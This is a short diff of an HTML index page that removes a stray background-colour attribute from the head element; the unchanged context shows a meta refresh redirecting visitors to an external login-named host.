--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <html>
-  <head bgcolor=yellow>
+  <head>
     <meta http-equiv="refresh" content="7; url='http://login8080.nat123.cc'" />
   </head>
   <body>
